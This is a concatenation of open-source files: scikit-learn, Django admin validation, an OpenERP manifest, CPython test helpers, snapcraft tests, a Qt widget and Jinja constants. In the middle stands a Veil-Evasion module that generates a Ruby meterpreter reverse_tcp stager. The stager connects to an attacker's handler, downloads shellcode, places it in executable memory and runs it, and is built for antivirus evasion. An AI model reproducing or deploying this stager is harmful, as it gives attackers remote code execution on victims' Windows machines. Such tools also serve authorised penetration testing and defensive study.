class_weight_ = compute_class_weight(class_weight, classes_, y)
else:
class_weight_ = np.empty(0, dtype=np.float)
y_ind = y
liblinear.set_verbosity_wrap(verbose)
rnd = check_random_state(random_state)
if verbose:
print('[LibLinear]', end='')
# LinearSVC breaks when intercept_scaling is <= 0
bias = -1.0
if fit_intercept:
if intercept_scaling <= 0:
raise ValueError("Intercept scaling is %r but needs to be greater than 0."
" To disable fitting an intercept,"
" set fit_intercept=False." % intercept_scaling)
else:
bias = intercept_scaling
libsvm.set_verbosity_wrap(verbose)
libsvm_sparse.set_verbosity_wrap(verbose)
liblinear.set_verbosity_wrap(verbose)
# LibLinear wants targets as doubles, even for classification
y_ind = np.asarray(y_ind, dtype=np.float64).ravel()
solver_type = _get_liblinear_solver_type(multi_class, penalty, loss, dual)
raw_coef_, n_iter_ = liblinear.train_wrap(
X, y_ind, sp.isspmatrix(X), solver_type, tol, bias, C,
class_weight_, max_iter, rnd.randint(np.iinfo('i').max),
epsilon)
# Regarding rnd.randint(..) in the above signature:
# seed for srand in range [0..INT_MAX); due to limitations in Numpy
# on 32-bit platforms, we can't get to the UINT_MAX limit that
# srand supports
n_iter_ = max(n_iter_)
if n_iter_ >= max_iter and verbose > 0:
warnings.warn("Liblinear failed to converge, increase "
"the number of iterations.", ConvergenceWarning)
if fit_intercept:
coef_ = raw_coef_[:, :-1]
intercept_ = intercept_scaling * raw_coef_[:, -1]
else:
coef_ = raw_coef_
intercept_ = 0.
return coef_, intercept_, n_iter_
| bsd-3-clause |
rogerhu/django | django/contrib/admin/validation.py | 3 | 23723 | from django.core.exceptions import ImproperlyConfigured
from django.db import models
from django.db.models.fields import FieldDoesNotExist
from django.forms.models import BaseModelForm, BaseModelFormSet, _get_foreign_key
from django.contrib.admin.utils import get_fields_from_path, NotRelationField
"""
Does basic ModelAdmin option validation. Calls custom validation
classmethod in the end if it is provided in cls. The signature of the
custom validation classmethod should be: def validate(cls, model).
"""
__all__ = ['BaseValidator', 'InlineValidator']
class BaseValidator(object):
def __init__(self):
# Before we can introspect models, they need to be fully loaded so that
# inter-relations are set up correctly. We force that here.
models.get_apps()
def validate(self, cls, model):
for m in dir(self):
if m.startswith('validate_'):
getattr(self, m)(cls, model)
def check_field_spec(self, cls, model, flds, label):
"""
Validate the fields specification in `flds` from a ModelAdmin subclass
`cls` for the `model` model. Use `label` for reporting problems to the user.
The fields specification can be a ``fields`` option or a ``fields``
sub-option from a ``fieldsets`` option component.
"""
for fields in flds:
# The entry in fields might be a tuple. If it is a standalone
# field, make it into a tuple to make processing easier.
if type(fields) != tuple:
fields = (fields,)
for field in fields:
if field in cls.readonly_fields:
# Stuff can be put in fields that isn't actually a
# model field if it's in readonly_fields,
# readonly_fields will handle the validation of such
# things.
continue
try:
f = model._meta.get_field(field)
except models.FieldDoesNotExist:
# If we can't find a field on the model that matches, it could be an
# extra field on the form; nothing to check so move on to the next field.
continue
if isinstance(f, models.ManyToManyField) and not f.rel.through._meta.auto_created:
raise ImproperlyConfigured("'%s.%s' "
"can't include the ManyToManyField field '%s' because "
"'%s' manually specifies a 'through' model." % (
cls.__name__, label, field, field))
def validate_raw_id_fields(self, cls, model):
" Validate that raw_id_fields only contains field names that are listed on the model. "
if hasattr(cls, 'raw_id_fields'):
check_isseq(cls, 'raw_id_fields', cls.raw_id_fields)
for idx, field in enumerate(cls.raw_id_fields):
f = get_field(cls, model, 'raw_id_fields', field)
if not isinstance(f, (models.ForeignKey, models.ManyToManyField)):
raise ImproperlyConfigured("'%s.raw_id_fields[%d]', '%s' must "
"be either a ForeignKey or ManyToManyField."
% (cls.__name__, idx, field))
def validate_fields(self, cls, model):
" Validate that fields only refer to existing fields, doesn't contain duplicates. "
# fields
if cls.fields: # default value is None
check_isseq(cls, 'fields', cls.fields)
self.check_field_spec(cls, model, cls.fields, 'fields')
if cls.fieldsets:
raise ImproperlyConfigured('Both fieldsets and fields are specified in %s.' % cls.__name__)
if len(cls.fields) > len(set(cls.fields)):
raise ImproperlyConfigured('There are duplicate field(s) in %s.fields' % cls.__name__)
def validate_fieldsets(self, cls, model):
" Validate that fieldsets is properly formatted and doesn't contain duplicates. "
from django.contrib.admin.options import flatten_fieldsets
if cls.fieldsets: # default value is None
check_isseq(cls, 'fieldsets', cls.fieldsets)
for idx, fieldset in enumerate(cls.fieldsets):
check_isseq(cls, 'fieldsets[%d]' % idx, fieldset)
if len(fieldset) != 2:
raise ImproperlyConfigured("'%s.fieldsets[%d]' does not "
"have exactly two elements." % (cls.__name__, idx))
check_isdict(cls, 'fieldsets[%d][1]' % idx, fieldset[1])
if 'fields' not in fieldset[1]:
raise ImproperlyConfigured("'fields' key is required in "
"%s.fieldsets[%d][1] field options dict."
% (cls.__name__, idx))
self.check_field_spec(cls, model, fieldset[1]['fields'], "fieldsets[%d][1]['fields']" % idx)
flattened_fieldsets = flatten_fieldsets(cls.fieldsets)
if len(flattened_fieldsets) > len(set(flattened_fieldsets)):
raise ImproperlyConfigured('There are duplicate field(s) in %s.fieldsets' % cls.__name__)
def validate_exclude(self, cls, model):
" Validate that exclude is a sequence without duplicates. "
if cls.exclude: # default value is None
check_isseq(cls, 'exclude', cls.exclude)
if len(cls.exclude) > len(set(cls.exclude)):
raise ImproperlyConfigured('There are duplicate field(s) in %s.exclude' % cls.__name__)
def validate_form(self, cls, model):
" Validate that form subclasses BaseModelForm. "
if hasattr(cls, 'form') and not issubclass(cls.form, BaseModelForm):
raise ImproperlyConfigured("%s.form does not inherit from "
"BaseModelForm." % cls.__name__)
def validate_filter_vertical(self, cls, model):
" Validate that filter_vertical is a sequence of field names. "
if hasattr(cls, 'filter_vertical'):
check_isseq(cls, 'filter_vertical', cls.filter_vertical)
for idx, field in enumerate(cls.filter_vertical):
f = get_field(cls, model, 'filter_vertical', field)
if not isinstance(f, models.ManyToManyField):
raise ImproperlyConfigured("'%s.filter_vertical[%d]' must be "
"a ManyToManyField." % (cls.__name__, idx))
def validate_filter_horizontal(self, cls, model):
" Validate that filter_horizontal is a sequence of field names. "
if hasattr(cls, 'filter_horizontal'):
check_isseq(cls, 'filter_horizontal', cls.filter_horizontal)
for idx, field in enumerate(cls.filter_horizontal):
f = get_field(cls, model, 'filter_horizontal', field)
if not isinstance(f, models.ManyToManyField):
raise ImproperlyConfigured("'%s.filter_horizontal[%d]' must be "
"a ManyToManyField." % (cls.__name__, idx))
def validate_radio_fields(self, cls, model):
" Validate that radio_fields is a dictionary of choice or foreign key fields. "
from django.contrib.admin.options import HORIZONTAL, VERTICAL
if hasattr(cls, 'radio_fields'):
check_isdict(cls, 'radio_fields', cls.radio_fields)
for field, val in cls.radio_fields.items():
f = get_field(cls, model, 'radio_fields', field)
if not (isinstance(f, models.ForeignKey) or f.choices):
raise ImproperlyConfigured("'%s.radio_fields['%s']' "
"is neither an instance of ForeignKey nor does "
"have choices set." % (cls.__name__, field))
                if val not in (HORIZONTAL, VERTICAL):
raise ImproperlyConfigured("'%s.radio_fields['%s']' "
"is neither admin.HORIZONTAL nor admin.VERTICAL."
% (cls.__name__, field))
def validate_prepopulated_fields(self, cls, model):
" Validate that prepopulated_fields if a dictionary containing allowed field types. "
# prepopulated_fields
if hasattr(cls, 'prepopulated_fields'):
check_isdict(cls, 'prepopulated_fields', cls.prepopulated_fields)
for field, val in cls.prepopulated_fields.items():
f = get_field(cls, model, 'prepopulated_fields', field)
if isinstance(f, (models.DateTimeField, models.ForeignKey,
models.ManyToManyField)):
raise ImproperlyConfigured("'%s.prepopulated_fields['%s']' "
"is either a DateTimeField, ForeignKey or "
"ManyToManyField. This isn't allowed."
% (cls.__name__, field))
check_isseq(cls, "prepopulated_fields['%s']" % field, val)
for idx, f in enumerate(val):
get_field(cls, model, "prepopulated_fields['%s'][%d]" % (field, idx), f)
def validate_view_on_site_url(self, cls, model):
if hasattr(cls, 'view_on_site'):
if not callable(cls.view_on_site) and not isinstance(cls.view_on_site, bool):
raise ImproperlyConfigured("%s.view_on_site is not a callable or a boolean value." % cls.__name__)
def validate_ordering(self, cls, model):
" Validate that ordering refers to existing fields or is random. "
# ordering = None
if cls.ordering:
check_isseq(cls, 'ordering', cls.ordering)
for idx, field in enumerate(cls.ordering):
if field == '?' and len(cls.ordering) != 1:
raise ImproperlyConfigured("'%s.ordering' has the random "
"ordering marker '?', but contains other fields as "
"well. Please either remove '?' or the other fields."
% cls.__name__)
if field == '?':
continue
if field.startswith('-'):
field = field[1:]
# Skip ordering in the format field1__field2 (FIXME: checking
# this format would be nice, but it's a little fiddly).
if '__' in field:
continue
get_field(cls, model, 'ordering[%d]' % idx, field)
def validate_readonly_fields(self, cls, model):
" Validate that readonly_fields refers to proper attribute or field. "
if hasattr(cls, "readonly_fields"):
check_isseq(cls, "readonly_fields", cls.readonly_fields)
for idx, field in enumerate(cls.readonly_fields):
if not callable(field):
if not hasattr(cls, field):
if not hasattr(model, field):
try:
model._meta.get_field(field)
except models.FieldDoesNotExist:
raise ImproperlyConfigured("%s.readonly_fields[%d], %r is not a callable or an attribute of %r or found in the model %r."
% (cls.__name__, idx, field, cls.__name__, model._meta.object_name))
class ModelAdminValidator(BaseValidator):
def validate_save_as(self, cls, model):
" Validate save_as is a boolean. "
check_type(cls, 'save_as', bool)
def validate_save_on_top(self, cls, model):
" Validate save_on_top is a boolean. "
check_type(cls, 'save_on_top', bool)
def validate_inlines(self, cls, model):
" Validate inline model admin classes. "
from django.contrib.admin.options import BaseModelAdmin
if hasattr(cls, 'inlines'):
check_isseq(cls, 'inlines', cls.inlines)
for idx, inline in enumerate(cls.inlines):
if not issubclass(inline, BaseModelAdmin):
raise ImproperlyConfigured("'%s.inlines[%d]' does not inherit "
"from BaseModelAdmin." % (cls.__name__, idx))
if not inline.model:
raise ImproperlyConfigured("'model' is a required attribute "
"of '%s.inlines[%d]'." % (cls.__name__, idx))
if not issubclass(inline.model, models.Model):
raise ImproperlyConfigured("'%s.inlines[%d].model' does not "
"inherit from models.Model." % (cls.__name__, idx))
inline.validate(inline.model)
self.check_inline(inline, model)
def check_inline(self, cls, parent_model):
" Validate inline class's fk field is not excluded. "
fk = _get_foreign_key(parent_model, cls.model, fk_name=cls.fk_name, can_fail=True)
if hasattr(cls, 'exclude') and cls.exclude:
if fk and fk.name in cls.exclude:
raise ImproperlyConfigured("%s cannot exclude the field "
"'%s' - this is the foreign key to the parent model "
"%s.%s." % (cls.__name__, fk.name, parent_model._meta.app_label, parent_model.__name__))
def validate_list_display(self, cls, model):
" Validate that list_display only contains fields or usable attributes. "
if hasattr(cls, 'list_display'):
check_isseq(cls, 'list_display', cls.list_display)
for idx, field in enumerate(cls.list_display):
if not callable(field):
if not hasattr(cls, field):
if not hasattr(model, field):
try:
model._meta.get_field(field)
except models.FieldDoesNotExist:
raise ImproperlyConfigured("%s.list_display[%d], %r is not a callable or an attribute of %r or found in the model %r."
% (cls.__name__, idx, field, cls.__name__, model._meta.object_name))
else:
# getattr(model, field) could be an X_RelatedObjectsDescriptor
f = fetch_attr(cls, model, "list_display[%d]" % idx, field)
if isinstance(f, models.ManyToManyField):
raise ImproperlyConfigured("'%s.list_display[%d]', '%s' is a ManyToManyField which is not supported."
% (cls.__name__, idx, field))
def validate_list_display_links(self, cls, model):
" Validate that list_display_links either is None or a unique subset of list_display."
if hasattr(cls, 'list_display_links'):
if cls.list_display_links is None:
return
check_isseq(cls, 'list_display_links', cls.list_display_links)
for idx, field in enumerate(cls.list_display_links):
if field not in cls.list_display:
raise ImproperlyConfigured("'%s.list_display_links[%d]' "
"refers to '%s' which is not defined in 'list_display'."
% (cls.__name__, idx, field))
def validate_list_filter(self, cls, model):
"""
Validate that list_filter is a sequence of one of three options:
        1: 'field' - a basic field filter, possibly with relationships (e.g. 'field__rel')
2: ('field', SomeFieldListFilter) - a field-based list filter class
3: SomeListFilter - a non-field list filter class
"""
from django.contrib.admin import ListFilter, FieldListFilter
if hasattr(cls, 'list_filter'):
check_isseq(cls, 'list_filter', cls.list_filter)
for idx, item in enumerate(cls.list_filter):
if callable(item) and not isinstance(item, models.Field):
# If item is option 3, it should be a ListFilter...
if not issubclass(item, ListFilter):
raise ImproperlyConfigured("'%s.list_filter[%d]' is '%s'"
" which is not a descendant of ListFilter."
% (cls.__name__, idx, item.__name__))
# ... but not a FieldListFilter.
if issubclass(item, FieldListFilter):
raise ImproperlyConfigured("'%s.list_filter[%d]' is '%s'"
" which is of type FieldListFilter but is not"
" associated with a field name."
% (cls.__name__, idx, item.__name__))
else:
if isinstance(item, (tuple, list)):
# item is option #2
field, list_filter_class = item
if not issubclass(list_filter_class, FieldListFilter):
raise ImproperlyConfigured("'%s.list_filter[%d][1]'"
" is '%s' which is not of type FieldListFilter."
% (cls.__name__, idx, list_filter_class.__name__))
else:
# item is option #1
field = item
# Validate the field string
try:
get_fields_from_path(model, field)
except (NotRelationField, FieldDoesNotExist):
raise ImproperlyConfigured("'%s.list_filter[%d]' refers to '%s'"
" which does not refer to a Field."
% (cls.__name__, idx, field))
def validate_list_select_related(self, cls, model):
" Validate that list_select_related is a boolean, a list or a tuple. "
list_select_related = getattr(cls, 'list_select_related', None)
if list_select_related:
types = (bool, tuple, list)
if not isinstance(list_select_related, types):
raise ImproperlyConfigured("'%s.list_select_related' should be "
"either a bool, a tuple or a list" %
cls.__name__)
def validate_list_per_page(self, cls, model):
" Validate that list_per_page is an integer. "
check_type(cls, 'list_per_page', int)
def validate_list_max_show_all(self, cls, model):
" Validate that list_max_show_all is an integer. "
check_type(cls, 'list_max_show_all', int)
def validate_list_editable(self, cls, model):
"""
Validate that list_editable is a sequence of editable fields from
        list_display, excluding the first element.
"""
if hasattr(cls, 'list_editable') and cls.list_editable:
check_isseq(cls, 'list_editable', cls.list_editable)
for idx, field_name in enumerate(cls.list_editable):
try:
field = model._meta.get_field_by_name(field_name)[0]
except models.FieldDoesNotExist:
raise ImproperlyConfigured("'%s.list_editable[%d]' refers to a "
"field, '%s', not defined on %s.%s."
% (cls.__name__, idx, field_name, model._meta.app_label, model.__name__))
if field_name not in cls.list_display:
raise ImproperlyConfigured("'%s.list_editable[%d]' refers to "
"'%s' which is not defined in 'list_display'."
% (cls.__name__, idx, field_name))
if cls.list_display_links is not None:
if field_name in cls.list_display_links:
raise ImproperlyConfigured("'%s' cannot be in both '%s.list_editable'"
" and '%s.list_display_links'"
% (field_name, cls.__name__, cls.__name__))
if not cls.list_display_links and cls.list_display[0] in cls.list_editable:
raise ImproperlyConfigured("'%s.list_editable[%d]' refers to"
" the first field in list_display, '%s', which can't be"
" used unless list_display_links is set."
% (cls.__name__, idx, cls.list_display[0]))
if not field.editable:
raise ImproperlyConfigured("'%s.list_editable[%d]' refers to a "
"field, '%s', which isn't editable through the admin."
% (cls.__name__, idx, field_name))
def validate_search_fields(self, cls, model):
" Validate search_fields is a sequence. "
if hasattr(cls, 'search_fields'):
check_isseq(cls, 'search_fields', cls.search_fields)
def validate_date_hierarchy(self, cls, model):
" Validate that date_hierarchy refers to DateField or DateTimeField. "
if cls.date_hierarchy:
f = get_field(cls, model, 'date_hierarchy', cls.date_hierarchy)
if not isinstance(f, (models.DateField, models.DateTimeField)):
raise ImproperlyConfigured("'%s.date_hierarchy is "
"neither an instance of DateField nor DateTimeField."
% cls.__name__)
class InlineValidator(BaseValidator):
def validate_fk_name(self, cls, model):
" Validate that fk_name refers to a ForeignKey. "
if cls.fk_name: # default value is None
f = get_field(cls, model, 'fk_name', cls.fk_name)
if not isinstance(f, models.ForeignKey):
raise ImproperlyConfigured("'%s.fk_name is not an instance of "
"models.ForeignKey." % cls.__name__)
def validate_extra(self, cls, model):
" Validate that extra is an integer. "
check_type(cls, 'extra', int)
def validate_max_num(self, cls, model):
" Validate that max_num is an integer. "
check_type(cls, 'max_num', int)
def validate_formset(self, cls, model):
" Validate formset is a subclass of BaseModelFormSet. "
if hasattr(cls, 'formset') and not issubclass(cls.formset, BaseModelFormSet):
raise ImproperlyConfigured("'%s.formset' does not inherit from "
"BaseModelFormSet." % cls.__name__)
def check_type(cls, attr, type_):
if getattr(cls, attr, None) is not None and not isinstance(getattr(cls, attr), type_):
raise ImproperlyConfigured("'%s.%s' should be a %s."
% (cls.__name__, attr, type_.__name__))
def check_isseq(cls, label, obj):
if not isinstance(obj, (list, tuple)):
raise ImproperlyConfigured("'%s.%s' must be a list or tuple." % (cls.__name__, label))
def check_isdict(cls, label, obj):
if not isinstance(obj, dict):
raise ImproperlyConfigured("'%s.%s' must be a dictionary." % (cls.__name__, label))
def get_field(cls, model, label, field):
try:
return model._meta.get_field(field)
except models.FieldDoesNotExist:
raise ImproperlyConfigured("'%s.%s' refers to field '%s' that is missing from model '%s.%s'."
% (cls.__name__, label, field, model._meta.app_label, model.__name__))
def fetch_attr(cls, model, label, field):
try:
return model._meta.get_field(field)
except models.FieldDoesNotExist:
pass
try:
return getattr(model, field)
except AttributeError:
raise ImproperlyConfigured("'%s.%s' refers to '%s' that is neither a field, method or property of model '%s.%s'."
% (cls.__name__, label, field, model._meta.app_label, model.__name__))
| bsd-3-clause |
damdam-s/account-invoicing | __unported__/account_invoice_customer_ref_unique/__openerp__.py | 30 | 1749 | # -*- encoding: utf-8 -*-
# #############################################################################
#
# OpenERP, Open Source Management Solution
# This module copyright (C) 2010 - 2014 Savoir-faire Linux
# (<http://www.savoirfairelinux.com>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
{
'name': 'Unique Customer Reference in Invoice',
"version": "1.0",
'author': "Savoir-faire Linux,Odoo Community Association (OCA)",
'maintainer': 'Savoir-faire Linux',
'website': 'http://www.savoirfairelinux.com',
'license': 'AGPL-3',
'category': 'Accounting & Finance',
'description': """
Unique Customer Reference in Invoice
====================================
This module adds a case-insensitive unique constraint on the Customer
Reference (name field): (partner_id, name) must be unique.
Contributors
------------
* Marc Cassuto ([email protected])
* Mathieu Benoit ([email protected])
""",
'depends': [
'account',
],
'installable': False,
}
| agpl-3.0 |
mancoast/CPythonPyc_test | cpython/270_script_helper.py | 3 | 4045 | # Common utility functions used by various script execution tests
# e.g. test_cmd_line, test_cmd_line_script and test_runpy
import sys
import os
import os.path
import tempfile
import subprocess
import py_compile
import contextlib
import shutil
import zipfile
# Executing the interpreter in a subprocess
def python_exit_code(*args):
cmd_line = [sys.executable, '-E']
cmd_line.extend(args)
with open(os.devnull, 'w') as devnull:
return subprocess.call(cmd_line, stdout=devnull,
stderr=subprocess.STDOUT)
def spawn_python(*args, **kwargs):
cmd_line = [sys.executable, '-E']
cmd_line.extend(args)
return subprocess.Popen(cmd_line, stdin=subprocess.PIPE,
stdout=subprocess.PIPE, stderr=subprocess.STDOUT,
**kwargs)
def kill_python(p):
p.stdin.close()
data = p.stdout.read()
p.stdout.close()
# try to cleanup the child so we don't appear to leak when running
# with regrtest -R.
p.wait()
subprocess._cleanup()
return data
def run_python(*args, **kwargs):
if __debug__:
p = spawn_python(*args, **kwargs)
else:
p = spawn_python('-O', *args, **kwargs)
stdout_data = kill_python(p)
return p.wait(), stdout_data
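# Illustrative use of the helpers above (hypothetical one-liner):
#   rc, out = run_python('-c', 'import sys; sys.stdout.write("ok")')
#   # expect rc == 0 and out == 'ok' on CPython 2.x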
# Script creation utilities
@contextlib.contextmanager
def temp_dir():
dirname = tempfile.mkdtemp()
dirname = os.path.realpath(dirname)
try:
yield dirname
finally:
shutil.rmtree(dirname)
def make_script(script_dir, script_basename, source):
script_filename = script_basename+os.extsep+'py'
script_name = os.path.join(script_dir, script_filename)
script_file = open(script_name, 'w')
script_file.write(source)
script_file.close()
return script_name
def compile_script(script_name):
py_compile.compile(script_name, doraise=True)
if __debug__:
compiled_name = script_name + 'c'
else:
compiled_name = script_name + 'o'
return compiled_name
def make_zip_script(zip_dir, zip_basename, script_name, name_in_zip=None):
zip_filename = zip_basename+os.extsep+'zip'
zip_name = os.path.join(zip_dir, zip_filename)
zip_file = zipfile.ZipFile(zip_name, 'w')
if name_in_zip is None:
name_in_zip = os.path.basename(script_name)
zip_file.write(script_name, name_in_zip)
zip_file.close()
#if test.test_support.verbose:
# zip_file = zipfile.ZipFile(zip_name, 'r')
# print 'Contents of %r:' % zip_name
# zip_file.printdir()
# zip_file.close()
return zip_name, os.path.join(zip_name, name_in_zip)
def make_pkg(pkg_dir):
os.mkdir(pkg_dir)
make_script(pkg_dir, '__init__', '')
def make_zip_pkg(zip_dir, zip_basename, pkg_name, script_basename,
source, depth=1, compiled=False):
unlink = []
init_name = make_script(zip_dir, '__init__', '')
unlink.append(init_name)
init_basename = os.path.basename(init_name)
script_name = make_script(zip_dir, script_basename, source)
unlink.append(script_name)
if compiled:
init_name = compile_script(init_name)
script_name = compile_script(script_name)
unlink.extend((init_name, script_name))
pkg_names = [os.sep.join([pkg_name]*i) for i in range(1, depth+1)]
script_name_in_zip = os.path.join(pkg_names[-1], os.path.basename(script_name))
zip_filename = zip_basename+os.extsep+'zip'
zip_name = os.path.join(zip_dir, zip_filename)
zip_file = zipfile.ZipFile(zip_name, 'w')
for name in pkg_names:
init_name_in_zip = os.path.join(name, init_basename)
zip_file.write(init_name, init_name_in_zip)
zip_file.write(script_name, script_name_in_zip)
zip_file.close()
for name in unlink:
os.unlink(name)
#if test.test_support.verbose:
# zip_file = zipfile.ZipFile(zip_name, 'r')
# print 'Contents of %r:' % zip_name
# zip_file.printdir()
# zip_file.close()
return zip_name, os.path.join(zip_name, script_name_in_zip)
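# Sketch of building a zipped package two levels deep (hypothetical names):
#   with temp_dir() as d:
#       zip_name, run_name = make_zip_pkg(d, 'test_zip', 'pkg', 'script',
#                                         "print 'hello'", depth=2)
#   # run_name points inside the zip: <d>/test_zip.zip/pkg/pkg/script.py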
| gpl-3.0 |
jorik041/Veil-Evasion | modules/payloads/ruby/meterpreter/rev_tcp.py | 4 | 2456 | """
Custom-written pure ruby meterpreter/reverse_tcp stager.
TODO: better randomization
Module built by @harmj0y
"""
from modules.common import shellcode
from modules.common import helpers
class Payload:
def __init__(self):
# required options
self.description = "pure windows/meterpreter/reverse_tcp stager, no shellcode"
self.language = "ruby"
self.extension = "rb"
self.rating = "Normal"
        # options we require user interaction for - format is {Option : [Value, Description]}
self.required_options = { "compile_to_exe" : ["Y", "Compile to an executable"],
"LHOST" : ["", "IP of the metasploit handler"],
"LPORT" : ["", "Port of the metasploit handler"]}
def generate(self):
payloadCode = "require 'rubygems';require 'win32/api';require 'socket';include Win32\n"
payloadCode += "exit if Object.const_defined?(:Ocra)\n"
payloadCode += "$v = API.new('VirtualAlloc', 'IIII', 'I');$r = API.new('RtlMoveMemory', 'IPI', 'V');$c = API.new('CreateThread', 'IIIIIP', 'I');$w = API.new('WaitForSingleObject', 'II', 'I')\n"
payloadCode += "$g_o = API.new('_get_osfhandle', 'I', 'I', 'msvcrt.dll')\n"
payloadCode += "def g(ip,port)\n"
payloadCode += "\tbegin\n"
payloadCode += "\t\ts = TCPSocket.open(ip, port)\n"
payloadCode += "\t\tpl = Integer(s.recv(4).unpack('L')[0])\n"
payloadCode += "\t\tp = \" \"\n"
payloadCode += "\t\twhile p.length < pl\n\t\tp += s.recv(pl) end\n"
payloadCode += "\t\tp[0] = ['BF'].pack(\"H*\")\n"
payloadCode += "\t\tsd = $g_o.call(s.fileno)\n"
payloadCode += "\t\tfor i in 1..4\n\t\t\tp[i] = Array(sd).pack('V')[i-1] end\n"
payloadCode += "\t\treturn p\n"
payloadCode += "\trescue\n\treturn \"\"\n\tend\nend\n"
payloadCode += "def ij(sc)\n"
payloadCode += "\tif sc.length > 1000\n"
payloadCode += "\t\tpt = $v.call(0,(sc.length > 0x1000 ? sc.length : 0x1000), 0x1000, 0x40)\n"
payloadCode += "\t\tx = $r.call(pt,sc,sc.length)\n"
payloadCode += "\t\tx = $w.call($c.call(0,0,pt,0,0,0),0xFFFFFFF)\n"
payloadCode += "\tend\nend\n"
payloadCode += "ij(g(\"%s\",%s))" % (self.required_options["LHOST"][0], self.required_options["LPORT"][0])
return payloadCode
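# Hypothetical use inside the framework: set the handler options, then
# generate the ruby stager source.
#   p = Payload()
#   p.required_options["LHOST"][0] = "192.168.1.10"
#   p.required_options["LPORT"][0] = "4444"
#   ruby_source = p.generate()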
| gpl-3.0 |
ThomasMcVay/MediaApp | MediaAppKnobs/IntKnob.py | 1 | 1958 | #===============================================================================
# @Author: Madison Aster
# @ModuleDescription:
# @License:
# MediaApp Library - Python Package framework for developing robust Media
# Applications with Qt Library
# Copyright (C) 2013 Madison Aster
#
# This library is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License version 2.1 as published by the Free Software Foundation;
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
#
# See LICENSE in the root directory of this library for copy of
# GNU Lesser General Public License and other license details.
#===============================================================================
from Qt import QtGui, QtCore, QtWidgets
from .KnobConstructor import Knob
from . import KnobElements
class IntKnob(Knob):
def __init__(self, value, name = 'IntKnob'):
super(IntKnob, self).__init__()
self.setSizePolicy(QtWidgets.QSizePolicy.Maximum, QtWidgets.QSizePolicy.Fixed)
self.IntWidget = KnobElements.IntWidget()
self.knobLayout.addWidget(self.IntWidget)
#self.knobLayout.addWidget(KnobElements.Spacer())
self.name.setText(name)
self.setValue(value)
def setValue(self, value):
self.IntWidget.setValue(value)
def getValue(self):
return self.IntWidget.getValue()
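# Minimal usage sketch (assumes a running Qt application; values hypothetical):
#   knob = IntKnob(5, name='Count')
#   knob.setValue(10)
#   assert knob.getValue() == 10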
| lgpl-2.1 |
josepht/snapcraft | snapcraft/tests/states/test_pull.py | 7 | 3875 | # -*- Mode:Python; indent-tabs-mode:nil; tab-width:4 -*-
#
# Copyright (C) 2016 Canonical Ltd
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License version 3 as
# published by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import yaml
import snapcraft.internal
from snapcraft import tests
class PullStateBaseTestCase(tests.TestCase):
def setUp(self):
super().setUp()
class Project:
def __init__(self):
self.deb_arch = 'amd64'
self.project = Project()
self.property_names = ['foo']
self.part_properties = {'foo': 'bar'}
self.state = snapcraft.internal.states.PullState(
self.property_names, self.part_properties, self.project)
class PullStateTestCase(PullStateBaseTestCase):
def test_yaml_conversion(self):
state_from_yaml = yaml.load(yaml.dump(self.state))
self.assertEqual(self.state, state_from_yaml)
def test_comparison(self):
other = snapcraft.internal.states.PullState(
self.property_names, self.part_properties, self.project)
self.assertTrue(self.state == other, 'Expected states to be identical')
def test_properties_of_interest(self):
self.part_properties.update({
'plugin': 'test-plugin',
'stage-packages': ['test-stage-package'],
'source': 'test-source',
'source-commit': 'test-source-commit',
'source-depth': 'test-source-depth',
'source-tag': 'test-source-tag',
'source-type': 'test-source-type',
'source-branch': 'test-source-branch',
'source-subdir': 'test-source-subdir',
})
properties = self.state.properties_of_interest(self.part_properties)
self.assertEqual(10, len(properties))
self.assertEqual('bar', properties['foo'])
self.assertEqual('test-plugin', properties['plugin'])
self.assertEqual(['test-stage-package'], properties['stage-packages'])
self.assertEqual('test-source', properties['source'])
self.assertEqual('test-source-commit', properties['source-commit'])
self.assertEqual('test-source-depth', properties['source-depth'])
self.assertEqual('test-source-tag', properties['source-tag'])
self.assertEqual('test-source-type', properties['source-type'])
self.assertEqual('test-source-branch', properties['source-branch'])
self.assertEqual('test-source-subdir', properties['source-subdir'])
def test_project_options_of_interest(self):
options = self.state.project_options_of_interest(self.project)
self.assertEqual(1, len(options))
self.assertEqual('amd64', options['deb_arch'])
class PullStateNotEqualTestCase(PullStateBaseTestCase):
scenarios = [
('no property names', dict(
other_property='property_names', other_value=[])),
('no part properties', dict(
other_property='part_properties', other_value=None)),
('no project', dict(
other_property='project', other_value=None)),
]
def test_comparison_not_equal(self):
setattr(self, self.other_property, self.other_value)
other_state = snapcraft.internal.states.PullState(
self.property_names, self.part_properties, self.project)
self.assertFalse(self.state == other_state,
'Expected states to be different')
| gpl-3.0 |
ownport/ansiblite | src/jinja2/constants.py | 220 | 1626 | # -*- coding: utf-8 -*-
"""
jinja.constants
~~~~~~~~~~~~~~~
Various constants.
:copyright: (c) 2017 by the Jinja Team.
:license: BSD, see LICENSE for more details.
"""
#: list of lorem ipsum words used by the lipsum() helper function
LOREM_IPSUM_WORDS = u'''\
a ac accumsan ad adipiscing aenean aliquam aliquet amet ante aptent arcu at
auctor augue bibendum blandit class commodo condimentum congue consectetuer
consequat conubia convallis cras cubilia cum curabitur curae cursus dapibus
diam dictum dictumst dignissim dis dolor donec dui duis egestas eget eleifend
elementum elit enim erat eros est et etiam eu euismod facilisi facilisis fames
faucibus felis fermentum feugiat fringilla fusce gravida habitant habitasse hac
hendrerit hymenaeos iaculis id imperdiet in inceptos integer interdum ipsum
justo lacinia lacus laoreet lectus leo libero ligula litora lobortis lorem
